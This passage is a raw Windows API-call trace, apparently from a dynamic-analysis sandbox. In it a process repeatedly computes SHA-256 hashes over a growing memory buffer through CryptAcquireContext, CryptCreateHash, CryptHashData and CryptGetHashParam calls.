	[0201.839] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.839] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0201.839] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9f88
	[0201.839] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9f88, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9f88, pdwDataLen=0x129424) returned 1
	[0201.839] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.839] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.839] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.839] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.839] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0201.839] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9fb0
	[0201.839] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9fb0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9fb0, pdwDataLen=0x129424) returned 1
	[0201.839] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.839] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.839] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.840] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.840] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0201.840] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.840] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9fd8
	[0201.840] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9fd8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9fd8, pdwDataLen=0x129424) returned 1
	[0201.840] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.840] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.840] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.840] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.840] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0201.840] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.840] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca000
	[0201.840] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca000, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca000, pdwDataLen=0x129424) returned 1
	[0201.840] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.840] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.840] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.841] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.841] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0201.841] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.841] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca028
	[0201.841] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca028, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca028, pdwDataLen=0x129424) returned 1
	[0201.841] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.841] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.841] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.841] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.841] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0201.842] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca050
	[0201.842] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca050, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca050, pdwDataLen=0x129424) returned 1
	[0201.842] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.842] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.842] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.842] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.842] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0201.842] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca078
	[0201.842] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca078, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca078, pdwDataLen=0x129424) returned 1
	[0201.842] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.842] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.842] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.843] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.843] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0201.843] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca0a0
	[0201.843] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca0a0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca0a0, pdwDataLen=0x129424) returned 1
	[0201.843] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.843] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.843] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.843] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.843] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0201.843] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca0c8
	[0201.843] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca0c8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca0c8, pdwDataLen=0x129424) returned 1
	[0201.843] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.843] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.843] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.844] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.844] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0201.844] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca0f0
	[0201.844] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca0f0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca0f0, pdwDataLen=0x129424) returned 1
	[0201.844] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.844] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.844] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.844] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.844] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0201.844] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca118
	[0201.844] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca118, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca118, pdwDataLen=0x129424) returned 1
	[0201.844] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.844] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.844] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.845] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.845] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0201.845] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca140
	[0201.845] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca140, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca140, pdwDataLen=0x129424) returned 1
	[0201.845] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.845] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.845] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.845] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.845] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0201.845] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca168
	[0201.845] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca168, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca168, pdwDataLen=0x129424) returned 1
	[0201.845] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.845] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.845] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.846] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.846] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0201.846] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.846] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca190
	[0201.846] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca190, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca190, pdwDataLen=0x129424) returned 1
	[0201.846] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.846] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.846] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.846] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.846] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0201.846] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.846] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca1b8
	[0201.846] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca1b8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca1b8, pdwDataLen=0x129424) returned 1
	[0201.846] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.846] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.846] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.847] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.847] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0201.847] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.847] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca1e0
	[0201.847] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca1e0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca1e0, pdwDataLen=0x129424) returned 1
	[0201.847] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.847] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.847] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.847] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.847] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0201.847] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.847] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca208
	[0201.847] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca208, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca208, pdwDataLen=0x129424) returned 1
	[0201.847] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.847] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.847] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.848] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.848] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0201.848] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.848] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca230
	[0201.848] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca230, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca230, pdwDataLen=0x129424) returned 1
	[0201.848] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.848] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.848] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.848] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.848] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0201.848] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.848] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca258
	[0201.848] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca258, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca258, pdwDataLen=0x129424) returned 1
	[0201.848] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.848] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.848] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.849] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.849] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0201.849] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.849] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca280
	[0201.849] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca280, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca280, pdwDataLen=0x129424) returned 1
	[0201.849] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.849] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.849] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.849] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.849] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0201.849] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.849] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca2a8
	[0201.849] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca2a8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca2a8, pdwDataLen=0x129424) returned 1
	[0201.849] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.849] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.849] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.850] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.850] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0201.850] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.850] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca2d0
	[0201.850] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca2d0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca2d0, pdwDataLen=0x129424) returned 1
	[0201.850] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.850] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.850] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.850] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.850] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0201.850] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.850] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca2f8
	[0201.850] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca2f8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca2f8, pdwDataLen=0x129424) returned 1
	[0201.850] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.850] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.850] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.851] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.851] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0201.851] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.851] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca320
	[0201.851] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca320, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca320, pdwDataLen=0x129424) returned 1
	[0201.851] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.851] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.851] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.851] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.851] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0201.851] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.851] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca348
	[0201.851] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca348, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca348, pdwDataLen=0x129424) returned 1
	[0201.851] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.851] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.852] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.852] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.852] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0201.852] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.852] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca370
